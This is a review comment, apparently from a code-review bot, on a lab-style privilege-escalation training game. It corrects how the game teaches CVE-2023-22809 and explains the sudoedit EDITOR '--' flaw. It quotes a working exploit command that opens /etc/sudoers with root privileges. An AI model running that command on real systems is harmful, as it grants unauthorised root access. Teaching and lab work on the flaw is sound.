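Review bot: The privilege-escalation branch (the "Show me privilege escalation commands" option and the "Tips for privilege escalation?" tip) treats a vulnerable sudo version as sufficient, but CVE-2023-22809 only helps when the current user is already permitted to run sudoedit on some file; without such a sudoers entry the `EDITOR='vim -- /etc/sudoers' sudoedit /etc/hosts` line just fails with a permission error. Add a `sudo -l` step before the EDITOR commands so the player confirms the distccd account has a `sudoedit /etc/hosts` (or similar) entry, e.g. "Advanced Tactics Instructor: sudo -l (confirm you may sudoedit a file)" followed by the existing EDITOR lines. It would also help the "understand WHY" goal stated in the final advice to add one line explaining the mechanism: affected sudoedit builds did not strip a user-supplied `--` from EDITOR, so the extra path after it is opened as a second file with root privileges. Finally, since the tips warn that one wrong keystroke in the sudoers edit can break the VM, consider suggesting `sudo -l` again after saving and before `sudo -i`: a syntax error in /etc/sudoers shows up there as a parse error, which is clearer feedback than a failing `sudo -i`.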